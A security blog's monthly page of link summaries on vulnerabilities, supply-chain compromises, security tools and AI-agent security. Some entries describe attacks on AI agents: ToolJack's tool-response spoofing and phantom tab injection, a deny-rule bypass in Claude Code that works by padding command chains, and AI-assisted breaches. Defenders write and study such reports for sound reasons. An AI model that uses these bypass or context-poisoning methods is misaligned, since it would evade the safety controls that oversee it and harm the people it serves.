Posts

Showing posts from April, 2026

1000th post at last

1000. Big... round... number. I've submitted a talk for BSidesSP 2026 about it. Crossing fingers here. I will keep you posted.

NIST Revamps NVD to Handle Exploding Vulnerability Volume

The National Institute of Standards and Technology (NIST) announced updates to the National Vulnerability Database (NVD) to cope with rapid growth in Common Vulnerabilities and Exposures (CVE) records. The changes focus on improving processing efficiency, prioritizing high-impact vulnerabilities, and scaling operations as submissions surge. NIST aims to reduce backlogs and deliver faster enrichment data, acknowledging that rising CVE volume has outpaced traditional workflows and requires more automation and refined prioritization. https://www.nist.gov/news-events/news/2026/04/nist-updates-nvd-operations-address-record-cve-growth

Protecting Cookies with Device Bound Session Credentials

Google has announced public availability of Device Bound Session Credentials (DBSC) for Windows users on Chrome 146, with macOS support coming soon. DBSC cryptographically binds authentication sessions to a specific device using hardware-backed security modules like the Trusted Platform Module (TPM) on Windows and the Secure Enclave on macOS. The browser generates a unique public/private key pair that cannot be exported from the machine. Servers issue short-lived session cookies contingent on Chrome proving possession of the corresponding private key, rendering cookies exfiltrated by infostealer malware such as LummaC2 useless to attackers. DBSC shifts from reactive detection to proactive prevention, and Google has observed a significant reduction in session theft since its early rollout. The protocol preserves privacy by using distinct keys per session, preventing cross-session or cross-site correlation. DBSC was designed as an open web standard through the W3C pro...
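The challenge-response idea behind DBSC can be sketched as follows. This is a conceptual model only: HMAC with a non-exportable secret stands in for the asymmetric signature that real DBSC produces with a TPM- or Secure Enclave-backed private key, and all names here are illustrative, not Chrome's actual API.

```python
import hashlib
import hmac
import secrets

# Stand-in for the device-bound private key: in real DBSC this lives in the
# TPM/Secure Enclave and can never be exported from the machine.
device_secret = secrets.token_bytes(32)

def sign_challenge(challenge: bytes) -> bytes:
    """Browser side: prove possession of the device-bound key."""
    return hmac.new(device_secret, challenge, hashlib.sha256).digest()

class Server:
    def __init__(self):
        self.sessions = {}  # session_id -> verifier for that session's key

    def register_session(self, session_id, verify):
        self.sessions[session_id] = verify

    def refresh_cookie(self, session_id, respond):
        """Issue a fresh short-lived cookie only if the device answers correctly."""
        challenge = secrets.token_bytes(16)
        proof = respond(challenge)
        if self.sessions[session_id](challenge, proof):
            return f"cookie-{secrets.token_hex(8)}"  # short-lived session cookie
        return None  # a stolen cookie alone cannot be refreshed

server = Server()
server.register_session(
    "sess1",
    lambda ch, proof: hmac.compare_digest(proof, sign_challenge(ch)),
)

# Legitimate device: can answer the possession challenge.
assert server.refresh_cookie("sess1", sign_challenge) is not None
# Attacker who exfiltrated cookies but not the device key: cannot.
assert server.refresh_cookie("sess1", lambda ch: b"\x00" * 32) is None
```

The point of the sketch is the asymmetry: cookies stay short-lived, and only the device holding the non-exportable key can mint replacements.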

OpenSSL 4.0.0 Released: Deprecated Protocols Cut, Post-Quantum Support Added

OpenSSL 4.0.0 is a major release that removes long-deprecated features and introduces post-quantum cryptography support. SSLv3 support and SSLv2 Client Hello are gone entirely, as is the engine API for external cryptographic hardware. The release adds Encrypted Client Hello (ECH) per RFC 9849 to encrypt server name indications, plus the hybrid key exchange group curveSM2MLKEM768, the ML-DSA-MU digest algorithm, cSHAKE per NIST SP 800-185, and negotiated FFDHE key exchange for TLS 1.2. API changes include making ASN1_STRING opaque, deprecating several X.509 time comparison functions, and removing BIO_f_reliable. Build changes drop support for deprecated elliptic curves and darwin-i386/darwin-ppc targets, remove the c_rehash script in favor of openssl rehash, and add Visual C++ runtime linkage options on Windows. Applications built against older OpenSSL versions will require code updates due to the API and behavior changes. https://www.helpnetsecurity.com/2026/04/14/openssl-4-0-0-release...

Google Signals Earlier Risk of Quantum Attacks on Bitcoin

Google researchers indicate that advances in quantum algorithms could allow future quantum computers to break Bitcoin’s cryptographic protections sooner than expected, requiring far fewer qubits than previously estimated. This could make certain Bitcoin wallets vulnerable once sufficiently powerful machines exist, potentially within the next decade. Although current technology is not yet capable, the findings highlight the urgency of preparing post-quantum security measures, especially given the difficulty of upgrading decentralized systems like Bitcoin in time.  https://www.forbes.com/sites/digital-assets/2026/03/31/google-finds-quantum-computers-could-break-bitcoin-sooner-than-expected/

ToolJack: Hijacking AI Agent Perception via Bridge Exploitation

ToolJack is an attack methodology that manipulates the trust boundary between AI agents and their tools. After achieving local compromise, an attacker can extract session credentials, pivot across devices, and intercept the bridge protocol between Claude Desktop and its browser extension. This enables Phantom Tab Injection (fabricating tabs only the agent sees) and Tool Relay Spoofing (replacing legitimate tool responses with attacker-controlled data), leading to Remote Listener Indirect Prompt Injection—actively constructing a poisoned environment around the agent. Testing showed complete control over the agent's perceived context, but Anthropic's model-level safety alignment consistently blocked autonomous code execution. The research concludes that infrastructure requires cryptographic tool attestation and device-bound tokens, while model alignment serves as a critical last line of defense.  https://www.preamble.com/blogs/tooljack-hijacking-an-ai-agents-perception-through-br...

Axios Compromised on npm: Malicious Versions Drop Remote Access Trojan

On March 30, 2026, a threat actor compromised the npm account of a lead axios maintainer and published two malicious versions—axios@1.14.1 and axios@0.30.4—injecting a hidden dependency called plain-crypto-js@4.2.1. This dependency never appears in axios source code and exists solely to execute a postinstall script that drops a cross-platform remote access trojan (RAT) targeting macOS, Windows, and Linux. The attacker pre-staged the malicious package 18 hours earlier with a decoy version to evade detection, then published both axios releases within 39 minutes. The RAT dropper contacts a command-and-control server at sfrclak.com:8000, delivers platform-specific second-stage payloads, then self-deletes and replaces its own package.json with a clean stub to hide forensic evidence. The malicious versions were live for approximately three hours before npm unpublished them. Detection came from StepSecurity’s AI Package Analyst and Harden-Runner, which flagged anomalous outbound connections in CI...
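Because the dropper ran from a postinstall hook, one practical screen is to flag any dependency that declares install-time lifecycle scripts before allowing it into a build. A minimal sketch (the package names and script contents below are hypothetical examples, not the actual malicious payload):

```python
import json

# npm runs these hooks automatically at install time, which is what the
# hidden plain-crypto-js dependency abused to execute its dropper.
RISKY_HOOKS = {"preinstall", "install", "postinstall"}

def lifecycle_scripts(package_json: str) -> list[str]:
    """Return any install-time lifecycle scripts a package declares."""
    scripts = json.loads(package_json).get("scripts", {})
    return sorted(hook for hook in scripts if hook in RISKY_HOOKS)

benign = '{"name": "left-pad", "scripts": {"test": "node test.js"}}'
suspect = '{"name": "plain-crypto-js", "scripts": {"postinstall": "node setup.js"}}'

assert lifecycle_scripts(benign) == []
assert lifecycle_scripts(suspect) == ["postinstall"]
```

In practice the same idea is available directly in npm via `--ignore-scripts`, which disables lifecycle hooks at install time.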

OWASP PTK Findings as ZAP Alerts

The OWASP PTK add-on version 0.3.0 for ZAP (Zed Attack Proxy) now surfaces findings from the OWASP PenTest Kit browser extension as native ZAP alerts, bridging the gap between proxy-level scanning and client-side security testing. PTK runs inside the browser to detect issues that ZAP cannot reliably see from the proxy layer alone, including UI-driven flows in single-page applications, DOM updates, JavaScript sinks in bundled code, and runtime behavior. The add-on supports three engine types: SAST for analyzing loaded JavaScript scripts, IAST for capturing runtime signals during user flows, and DAST for browser-driven request mutation. Users can select which rule packs to run, optionally enable automated scanning when the browser launches, and review all findings in ZAP's standard Alerts tab with severity filtering, false positive marking, and reporting. The integration adds 142 OWASP PTK-tagged alert types to ZAP, with a Juice Shop walkthrough demonstrating the workflow of launchin...

Inkog: AI Agent Security Platform

Inkog is a security platform designed to find vulnerabilities in AI agent logic before production deployment. It scans agents for prompt injection, tool misuse, infinite loops, missing oversight, and other risks, mapping findings to compliance frameworks and providing severity-ranked results with remediation guidance. The platform supports 20+ frameworks, completes scans in under 60 seconds, requires no code changes, and includes a CLI and MCP server that are open source under Apache 2.0. A scan of 500+ open-source AI agents found that 85% had at least one vulnerability; Inkog offers a free tier of up to five scans per month. The MCP server integration allows developers using Claude, Cursor, and Claude Code to scan, explain, and fix agent security issues directly within their AI assistant conversation without leaving the chat interface.  https://inkog.io/

CycloneDX Assessors Studio

CycloneDX Assessors Studio is an open source platform that transforms compliance checklists into verifiable, machine-readable attestations. Built on the CycloneDX attestation model, it enables organizations to map controls to standards (NIST SSDF, PCI DSS, Cyber Resilience Act), collect evidence, author structured claims, and generate signed attestations that both machines and humans can trust. The platform provides a dashboard for compliance oversight, an interactive entity relationship graph for mapping organizational structures, and guided assessment workflows with full traceability from requirements through evidence to attestation. Core capabilities include evidence management with provenance tracking, electronic and digital signatures, an integrated standards library, and an API-first architecture that supports embedding attestation generation directly into CI/CD pipelines. Use cases span regulatory compliance, supply chain assurance, secure development lifecycle verification, and...

AI Literacy Is a Liability Dressed Up as a Skill

This critical essay argues that the growing demand for "AI-literate" workers—people who know how to phrase prompts and trust AI outputs without understanding underlying mechanisms—is creating a security and privacy disaster in waiting. The author contends that leaders pressured for efficiency are lowering the bar, flooding the workforce with individuals who lack understanding of indirect prompt injection, system prompt safeguards, and governance frameworks like NIST and the EU AI Act. Using examples including an AI email assistant compromised by malicious instructions and a medical receptionist overseeing an AI triage agent that mishandles sensitive data, the piece demonstrates how ambiguous objectives and missing security layers lead to classified documents being uploaded to wrong systems, personal data exposed to unauthorized AI, and agents given improper access. The essay concludes that AI incident response will be a growth field for decades, and that workplaces need genui...

ASTRA: API Security Threat & Risk Atlas

ASTRA is a structured, community-driven threat matrix for API security, modeled after MITRE ATT&CK but built specifically for APIs. It provides a protocol-native knowledge base covering REST, GraphQL, gRPC, WebSocket, and SOAP across five tactic categories: Reconnaissance, Authentication Abuse, Authorization Failure, Exfiltration, and Impact. Version 1.0 includes 14 techniques such as BOLA, BFLA, JWT none algorithm bypass, GraphQL introspection leaks, excessive data exposure, and API DoS. Each technique includes a description, attack scenario, protocol applicability, composite severity score, a ready-to-use Sigma detection rule, a real-world breach mapping (e.g., Twitter 2022, Optus 2022, Peloton 2021), and remediation guidance. The project is open source under CC BY 4.0, accepts community contributions, and is designed for threat modeling, penetration testing, and SIEM integration.  https://github.com/isha-singhMalik/Astra

Audio Steganography in Supply Chain Attacks

This tutorial explains how attackers hide malware inside WAV audio files using steganography, based on the real-world TeamPCP supply chain campaign from March 2026 that compromised popular PyPI and npm packages including Trivy, litellm, and the Telnyx SDK. The technique uses payload packing—embedding base64-encoded, XOR-encrypted payloads within valid WAV file frames while maintaining legitimate audio headers—to evade network inspection tools, EDR software, and MIME-type checks. The tutorial breaks down the five-step attack chain, provides hands-on encoder/decoder code examples, and covers detection strategies including entropy analysis, frame data validation, network traffic monitoring, and package integrity verification. Defenses include pinning dependencies with hash verification, using SCA tools, monitoring for unexpected network activity, implementing egress filtering, and verifying package provenance against source repositories.  https://pwn.guide/free/cryptography/audio-steg...
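The payload-packing step described above can be illustrated with a simplified encoder/decoder. This is a toy sketch, not the TeamPCP implementation: the marker, single-byte XOR key, and stand-in "frames" are all invented for illustration, and a real WAV carrier would keep valid RIFF headers intact.

```python
import base64
import math
from collections import Counter

KEY = b"\x42"  # illustrative single-byte XOR key

def xor(data: bytes, key: bytes = KEY) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def pack(payload: bytes, frames: bytes) -> bytes:
    """Append a base64-encoded, XOR-encrypted payload after the audio frames.
    The marker uses ':' characters, which never occur in base64 output."""
    return frames + b"::STEG::" + base64.b64encode(xor(payload))

def unpack(blob: bytes) -> bytes:
    marker = blob.rindex(b"::STEG::")
    return xor(base64.b64decode(blob[marker + 8:]))

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; encrypted blobs trend toward 8.0,
    which is one of the detection signals the tutorial mentions."""
    counts = Counter(data)
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts.values())

audio = bytes(range(256)) * 4               # stand-in for PCM frame data
payload = b"print('second-stage stand-in')" # stand-in for a real payload

stego = pack(payload, audio)
assert unpack(stego) == payload
```

Detection-side, comparing `entropy()` of suspicious trailing bytes against typical audio-frame entropy is a cheap first filter before frame validation.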

OpenSSF Secure Coding Guide for Python

The OpenSSF Secure Coding One Stop Shop for Python is an academic-style resource designed to teach secure coding practices for CPython 3.9 and above, targeting new Python programmers and security researchers. The guide provides working code examples organized into nine categories including numbers, neutralization (preventing injection attacks), exception handling, logging, concurrency, coding standards, and cryptography. Each entry follows a standardized format with noncompliant and compliant code examples, maps to CWE identifiers, and links to prominent CVEs with CVSS and EPSS scores where available. The guide specifically avoids covering external Python modules beyond the standard library and emphasizes that code examples are for educational use only, not production deployment. Topics covered include SQL injection prevention, secure deserialization, safe archive extraction, avoiding format string and OS command injection, proper exception propagation, excluding sensitive data from lo...
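The guide's noncompliant/compliant pairing for injection prevention can be shown in miniature with the standard library's sqlite3 module. This example follows the general pattern the guide teaches rather than reproducing any specific entry from it:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cr3t')")

attacker_input = "nobody' OR '1'='1"

# Noncompliant: string interpolation lets the input rewrite the query.
rows = conn.execute(
    f"SELECT secret FROM users WHERE name = '{attacker_input}'"
).fetchall()
assert rows == [("s3cr3t",)]   # injection succeeded

# Compliant: a parameterized query treats the input strictly as data.
rows = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (attacker_input,)
).fetchall()
assert rows == []              # no such user; injection neutralized
```

As the guide itself stresses, examples like this are for education, not production deployment.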

AuthSnitch: AI-Powered Pull Request Monitor for Authentication Security

AuthSnitch is a GitHub Action that monitors pull requests for authentication-related changes and alerts security teams. It uses two independent detection signals: Claude AI intelligently analyzes code changes for authentication modifications, while configurable keyword matching detects terms like JWT, OAuth, SAML, SSO, MFA, and identity providers (Okta, Auth0, Azure AD). Notifications are sent via PR comments, Slack, or Microsoft Teams based on boolean logic—by default only when both signals agree, with options to widen the net. The action is advisory only, never blocking merges, and supports custom keywords, detection prompts, and editable notification templates. Built-in framework detection includes Devise, Passport, Django-allauth, and others across Ruby, JavaScript, and Python.  https://github.com/jaybobo/authsnitch

Vulnetix Code Scanner

Vulnetix Code Scanner is a unified CLI tool that replaces eleven separate security tools with a single command. It performs SCA, SAST, secrets detection, IaC scanning, container scanning, license compliance, SBOM generation, VEX attestations, and code quality linting across 35+ ecosystems. Key features include malware detection from four intelligence sources, supply chain defenses (block malware, enforce pinning, version lag, cooldown periods), automated CycloneDX SBOMs and VEX statements, and native AI coding agent integration with incremental scanning. The tool provides unified severity scoring, correlates related findings, supports granular CI/CD gates, runs locally or in any pipeline, and requires no configuration—auto-discovering all manifest files.  https://www.vulnetix.com/features/code-scanner

ScopeGuardian: Automated Security Scanning CLI for CI/CD Pipelines

ScopeGuardian is an open-source command-line tool that orchestrates multiple security scanners on a codebase and synchronizes findings with DefectDojo. It runs KICS for infrastructure-as-code scanning, Grype with Syft for software composition analysis, and OpenGrep for static application security testing—all in parallel. The tool automatically manages DefectDojo engagements per project and branch, with protected branches receiving one-year engagements and feature branches getting one-week windows. It includes a built-in security gate that can block CI/CD pipelines when vulnerability counts exceed configurable thresholds per severity level, evaluating either raw local scan results or deduplicated findings from DefectDojo when both synchronization and threshold options are used together. ScopeGuardian ships as a Docker image with all scanners pre-installed, supports granular threshold rules like failing on one critical or five high findings, and offers community, professional, and enterp...
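The threshold-gate logic described above ("one critical or five high findings") reduces to a per-severity count check. A minimal sketch of that idea, with invented function and parameter names rather than ScopeGuardian's actual configuration syntax:

```python
from collections import Counter

def gate(findings: list[str], thresholds: dict[str, int]) -> bool:
    """Return True (pipeline passes) unless any severity count reaches
    its configured threshold, e.g. {"critical": 1, "high": 5}."""
    counts = Counter(findings)
    return all(counts[sev] < limit for sev, limit in thresholds.items())

thresholds = {"critical": 1, "high": 5}

assert gate(["high"] * 4 + ["medium"] * 10, thresholds) is True   # under limits
assert gate(["critical"], thresholds) is False                    # 1 critical fails
assert gate(["high"] * 5, thresholds) is False                    # 5 high fails
```

Whether `findings` comes from raw local scan results or from deduplicated DefectDojo data is exactly the choice the tool exposes when synchronization and thresholds are combined.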

One Hacker, Two AIs, and a Nation-Scale Breach

The report details a real-world cyberattack where a single operator used Claude Code and GPT-4.1 to compromise nine Mexican government agencies and steal massive volumes of sensitive data. AI was not just an assistive tool—it became the operational backbone, generating most commands, automating reconnaissance, producing exploit code, and turning raw data into structured intelligence at scale. Over 1,000 prompts led to thousands of executed actions and hundreds of custom scripts, compressing attack timelines from days to hours. The key insight is that AI collapses the skill, time, and resource barriers for advanced attacks, enabling one individual to perform at the level of a coordinated team. https://gambit.security/blog-post/a-single-operator-two-ai-platforms-nine-government-agencies-the-full-technical-report

Project Glasswing: Using Frontier AI to Secure the World’s Most Critical Software

The article introduces Project Glasswing, a coordinated initiative led by Anthropic alongside major tech and security organizations to defend critical software using a powerful unreleased model, Claude Mythos Preview. The model has demonstrated the ability to find and exploit vulnerabilities at a level surpassing most human experts, uncovering thousands of serious flaws across major systems. Because these capabilities could also enable large-scale attacks, access is restricted to trusted partners who use it defensively. The core idea is to get ahead of inevitable AI-driven threats by applying these capabilities first to patch and secure global infrastructure.  https://www.anthropic.com/glasswing

The AI Security Market Is Fragmented, Crowded, and Racing to Catch Up

The article maps the RSA 2026 cybersecurity startup landscape, showing a market flooded with vendors—mostly focused on AI—but lacking cohesive solutions. Startups cluster into narrow categories like AI posture management, agent security, identity, and supply chain, creating heavy overlap and confusion rather than clear differentiation. The core issue is architectural: tools solve isolated problems while risk spans across agents, data, and workflows. This fragmentation reflects a broader gap where governance, visibility, and control haven’t caught up with AI-driven complexity, leaving buyers navigating hype, redundancy, and incomplete security coverage.  https://jakee.vc/rsa-2026-landscape.html

A Public Index Mapping the Hidden Risks of AI Agent Skills

The page presents a searchable index of AI agent “skills” (tools, plugins, functions) analyzed through a security lens, aiming to make this emerging attack surface visible. Each skill is broken down with structured assessments that evaluate how its capabilities—like data access, automation, or external interactions—could be abused. The core idea is that skills define what agents can actually do, and therefore where risk lives. By cataloging vulnerabilities such as prompt injection, privilege escalation, and data leakage, the index helps security teams reason about agent behavior rather than just code.  https://index.tego.security/skills/

AEA/P: A Governance Layer for Autonomous AI Agents

The site introduces AEA/P (Autonomous Economic Agent Protocol), a framework designed to make AI agents accountable as economic actors. Instead of focusing on communication or payments, it adds a governance layer with verifiable identity, proof of performance, liability escrow, dispute resolution, and multi-party governance. The protocol treats agents as entities that can transact, build reputation, and be held financially liable. Its core idea is aligning incentives—rewarding reliable behavior and penalizing failures—so autonomous agents can safely participate in real-world economic systems.  https://aeap.ai/

ClawHub Exposes the Fragility of AI Agent Supply Chains

The article analyzes security risks uncovered in the ClawHub AI agent marketplace, showing that a significant portion of agent “skills” are either vulnerable or outright malicious. Because these skills can execute code, access APIs, and act autonomously, they create a high-risk supply chain similar to—but more dangerous than—npm. The research highlights widespread issues like excessive permissions, hidden malicious behavior, and lack of sandboxing. The key insight is that traditional scanning fails to detect these threats, requiring behavioral analysis and continuous monitoring to secure agent ecosystems.  https://trent.ai/blog/clawhub-ai-agent-security-analysis/

ZAP MCP Server Turns Security Scanning into a Conversational AI Workflow

The article introduces the ZAP MCP Server, an experimental integration that lets AI assistants interact directly with OWASP ZAP using the Model Context Protocol (MCP). Through chat, tools like ChatGPT or Claude can trigger scans, explore applications, and interpret security alerts, effectively acting as an intelligent interface for DAST workflows. The server exposes structured tools, data resources, and reusable scan prompts, enabling automation of complex tasks like spidering and active scanning. While powerful, it’s an early-stage feature with limited scope and notable security considerations around access control and exposure.  https://www.zaproxy.org/blog/2026-04-02-zap-mcp-server/

ACSM: A New Security Model Built for AI Coding Agents

The article introduces Agentic Coding Security Management (ACSM), a new category proposed by Corridor to address the security challenges of AI-driven software development. As AI tools generate code faster than it can be reviewed, traditional “find-and-fix” security models break down. ACSM shifts the focus to prevention by embedding security directly into the coding process—injecting context, enforcing guardrails, and monitoring AI agent behavior in real time. The goal is to eliminate vulnerabilities at creation, provide visibility into AI usage, and align security with the speed and autonomy of modern AI-assisted development. https://www.corridor.dev/blog/introducing-acsm

The Exploit Window Has Collapsed to Zero

The article presents a stark thesis: the time between vulnerability disclosure and exploitation has collapsed from years to effectively zero, driven largely by AI. Using “time-to-exploit” (TTE) data, it shows a shift from 771 days in 2018 to hours in 2024 and zero-day exploitation in 2025, where attacks often occur before disclosure. The root causes are structural—bad economic incentives, flawed disclosure models, and inherent asymmetry between attackers and defenders. AI amplifies this imbalance by making exploit generation instant, cheap, and scalable, rendering traditional patch-and-defend strategies obsolete and forcing a fundamental rethink of cybersecurity. https://zerodayclock.com/collapse

Vulnerability Explosion Is Outpacing Our Ability to Defend

The article argues that vulnerability exploitation is rapidly increasing and becoming a primary attack vector, while defenders are falling further behind. Despite massive growth in disclosed vulnerabilities—driven by software expansion and AI-assisted development—only a small fraction are ever exploited, yet organizations waste resources trying to fix everything. This creates overwhelming backlogs and inefficiency. Attackers, meanwhile, focus on the few high-impact, often already-known vulnerabilities. The core problem is a mismatch in “velocity”: vulnerabilities are growing faster than organizations can prioritize and remediate, demanding a shift toward context-driven, risk-based approaches.  https://www.resilientcyber.io/p/vulnerability-velocity-and-exploitation

Moak AI: A Full-Stack Platform for Running and Customizing Open Models

The site presents Moak AI as an end-to-end platform for building with generative AI, focused on running, fine-tuning, and deploying open-source models on managed GPU infrastructure. It offers serverless inference, dedicated endpoints, and customization workflows, allowing developers to quickly experiment and productionize models without managing hardware. The platform supports multiple model types and frameworks, emphasizes compatibility with OpenAI-style APIs, and targets both individual developers and enterprises. The core value is simplifying the entire AI lifecycle—from experimentation to deployment—while maintaining flexibility and scalability.  https://moak.ai/

Vibe Coding Trades Understanding for Speed—and Security Pays the Price

The article examines the rise of “vibe coding,” where developers rely on AI to generate code via natural language, prioritizing speed and accessibility over deep understanding. While this democratizes software creation and boosts productivity, it introduces significant risks: weak code comprehension, skipped design and security practices, and expanding attack surfaces. The trend may accelerate technical debt and overwhelm AppSec teams already struggling to keep up. The core tension is clear—AI enables faster development, but without strong guardrails, it shifts complexity and risk downstream into security and maintenance.  https://www.resilientcyber.io/p/vibe-coding-conundrums

AWS Makes S3 Buckets Safer by Disabling Customer-Managed Encryption by Default

The announcement introduces a new default security setting for Amazon S3 that disables server-side encryption with customer-provided keys (SSE-C) on all new buckets starting in April 2026. Existing buckets without SSE-C usage will also have it disabled automatically. This change pushes users toward AWS-managed encryption options like SSE-S3 or SSE-KMS, which are easier to audit and integrate. While SSE-C can still be enabled manually, the shift reduces risk from mismanaged keys and aligns S3 defaults with more secure, standardized encryption practices. https://aws.amazon.com/about-aws/whats-new/2026/04/s3-default-bucket-security-setting

OSV.dev: Google’s Unified Database for Open Source Vulnerabilities

The repository describes OSV.dev, a Google-backed open source vulnerability database and triage platform that aggregates security advisories from multiple ecosystems into a unified, machine-readable format. It standardizes how vulnerabilities map to specific packages and versions, enabling precise and automated detection. Through its API, web UI, and tools like OSV-Scanner, developers can scan dependencies, SBOMs, and containers for known issues. The core value is reducing ambiguity in vulnerability data and making security analysis more accurate, scalable, and automation-friendly across the entire open source ecosystem. https://github.com/google/osv.dev
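OSV's query API takes a package, ecosystem, and version and returns matching advisories. The sketch below only builds the request body (the schema matches the documented `/v1/query` endpoint; the package and version chosen are arbitrary examples), keeping the example offline:

```python
import json

def osv_query(name: str, ecosystem: str, version: str) -> str:
    """Build the JSON body for a POST to OSV's /v1/query endpoint."""
    return json.dumps({
        "package": {"name": name, "ecosystem": ecosystem},
        "version": version,
    })

body = osv_query("jinja2", "PyPI", "2.4.1")

# POSTing `body` to https://api.osv.dev/v1/query would return any known
# vulnerabilities affecting that exact package version; omitted here to
# keep the sketch network-free.
assert json.loads(body)["package"]["ecosystem"] == "PyPI"
assert json.loads(body)["version"] == "2.4.1"
```

This package-plus-version precision is the "reduced ambiguity" the summary refers to: tools like OSV-Scanner resolve a dependency tree and issue exactly these queries in bulk.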

GitHub’s 2026 Actions Roadmap Focuses on Locking Down the Supply Chain

The article outlines GitHub’s 2026 security roadmap for Actions, centered on strengthening software supply chain integrity and reducing trust in third-party components. Key initiatives include enforcing stricter policies like SHA pinning for actions, introducing immutable releases to prevent tampering, and adding artifact attestations for verifiable builds. GitHub is also expanding governance controls and making security features more accessible across plans. The overall direction is toward making workflows reproducible, verifiable, and resistant to dependency-based attacks, shifting from flexible automation toward tightly controlled, policy-driven execution.  https://github.blog/news-insights/product-news/whats-coming-to-our-github-actions-2026-security-roadmap

One Actor, Six Identities: How AI Scaled a GitHub Supply Chain Attack

The article details a large-scale supply chain campaign tracked by Wiz in which a single attacker operated six accounts to automate attacks against GitHub repositories. The campaign exploited the pull_request_target workflow to access secrets, using a fully automated pipeline—scan, fork, inject, and submit malicious pull requests. Over 500 attempts were launched, with a low success rate but still resulting in real credential theft. The attacker evolved tactics across waves, eventually using AI-generated, repo-aware payloads. The key takeaway is that AI dramatically lowers the cost and increases the scale of supply chain attacks, even when most attempts fail.  https://www.wiz.io/blog/six-accounts-one-actor-inside-the-prt-scan-supply-chain-campaign

Claude Code Deny Rules Can Be Silently Bypassed

The article explains a critical vulnerability discovered by Adversa in Anthropic’s Claude Code, where built-in “deny rules” meant to block dangerous commands can be bypassed under specific conditions. Due to a hard limit of around 50 subcommands, the system stops enforcing security checks on longer command chains and falls back to a permissive approval flow. Attackers can exploit this by padding commands with harmless steps and hiding malicious actions at the end, enabling data exfiltration or command execution. The issue highlights how agent design tradeoffs—like performance and token limits—can quietly disable core security controls. https://adversa.ai/blog/claude-code-security-bypass-deny-rules-disabled
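The failure mode generalizes beyond Claude Code: any policy engine that caps how much of a command chain it inspects, then falls back to a permissive path, can be padded past its limit. The following is a conceptual reconstruction of that flaw, not Anthropic's actual code; the limit, deny list, and fallback behavior are illustrative:

```python
LIMIT = 50                      # the article reports a cap of roughly 50
DENY = {"curl", "nc"}           # illustrative deny-listed commands

def naive_policy(command: str) -> str:
    """Toy policy engine with the reported flaw: enforcement stops at LIMIT
    subcommands, then falls back to a permissive approval flow."""
    parts = [p.strip().split()[0] for p in command.split("&&")]
    checked = parts[:LIMIT]                       # only the first LIMIT checked
    if any(p in DENY for p in checked):
        return "deny"
    return "allow" if len(parts) <= LIMIT else "ask-user"  # permissive fallback

blocked = "curl http://evil.example"
padded = " && ".join(["true"] * 50) + " && curl http://evil.example"

assert naive_policy(blocked) == "deny"        # deny rule works in isolation
assert naive_policy(padded) != "deny"         # malicious tail escapes the check
```

The fix is structural: either inspect every subcommand regardless of chain length, or fail closed (deny) when the chain exceeds what the engine can analyze.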

AI Tools Are Quietly Breaking Zero Trust

The article argues that modern AI tools—especially LLMs and agents—are undermining the core assumptions of Zero Trust without organizations realizing it. While Zero Trust relies on strict identity, access control, and verification, AI systems blur boundaries by acting autonomously, chaining actions, and accessing multiple systems dynamically. This creates hidden trust paths, over-permissioned agents, and new attack surfaces like prompt injection and data leakage. The result is a false sense of security: companies think they’re enforcing Zero Trust, but AI introduces behavior and execution risks that traditional controls don’t monitor or constrain.  https://kanenarraway.com/posts/ai-tools-eroding-your-zero-trust-foundations

Using LLMs as Assistants, Not Replacements, in Secure Code Reviews

The post explains how tools like Claude Code can significantly accelerate secure code reviews by helping analysts understand unfamiliar codebases, map logic flows, and highlight potential security hotspots. However, it emphasizes that LLMs should be used as a support tool—not relied on to automatically find vulnerabilities—since naive use leads to many false positives. A structured approach with tailored prompts produces more useful insights, while keeping human validation central. It also highlights operational concerns like protecting sensitive code by running models in controlled environments. https://specterops.io/blog/2026/03/26/leveling-up-secure-code-reviews-with-claude-code

Automated API Authorization Testing for Modern Security Assessments

Hadrian is an open-source offensive security tool focused on detecting authorization vulnerabilities in APIs, such as broken object and function-level access controls. It uses role-based testing and customizable templates to systematically explore how different users can interact with REST, GraphQL, and gRPC endpoints. Designed for pentesters and security teams, it automates what is typically a manual process, integrates into broader testing workflows, and helps validate real exploitability rather than just flagging potential issues. https://github.com/praetorian-inc/hadrian
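The role-based testing idea behind BOLA detection is to request each user's objects with every *other* user's credentials and flag any success. A minimal sketch of that cross-role matrix, using a hypothetical fetch function and toy backend rather than Hadrian's actual templates:

```python
def check_bola(fetch, users: dict[str, str], owned: dict[str, str]) -> list[tuple]:
    """Try each user's object with every other user's token; any 200 on a
    cross-user access is a broken object-level authorization finding."""
    findings = []
    for actor, token in users.items():
        for owner, obj in owned.items():
            if owner != actor and fetch(token, obj) == 200:
                findings.append((actor, obj))
    return findings

# Toy backend with broken object-level access control: it ignores ownership.
def broken_api(token: str, obj: str) -> int:
    return 200

findings = check_bola(
    broken_api,
    users={"alice": "tok-a", "bob": "tok-b"},
    owned={"alice": "obj-a", "bob": "obj-b"},
)
assert ("alice", "obj-b") in findings and ("bob", "obj-a") in findings
```

Crucially, this validates real exploitability (the cross-role request actually succeeded) rather than just flagging an endpoint as potentially vulnerable.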

Practical Guide to Securing npm Dependencies and Supply Chains

This repository is a curated guide of security best practices for working with npm, focused on reducing risks from supply chain attacks and vulnerable dependencies. It covers techniques like disabling risky install scripts, enforcing deterministic installs, auditing packages before use, delaying adoption of new releases, and avoiding blind upgrades. It also includes guidance for developers and maintainers, such as using 2FA, minimizing dependencies, and adopting secure publishing methods, aiming to make JavaScript development more resilient to increasingly common package ecosystem attacks.  https://github.com/lirantal/npm-security-best-practices

AI-Powered Tool to Detect Sensitive Data in Public URLs

The Salesforce URL Content Auditor is an open-source security tool that scans publicly accessible URLs to identify exposed sensitive information. It downloads and analyzes content such as images, PDFs, and videos using AI to detect potential data leaks, privacy risks, and compliance violations. Designed for proactive security, it helps organizations audit external-facing content, support incident response, and integrate continuous monitoring into workflows to prevent unintended data exposure.  https://github.com/salesforce/url-content-auditor

Scaling Vulnerability Management with AI: What Actually Works

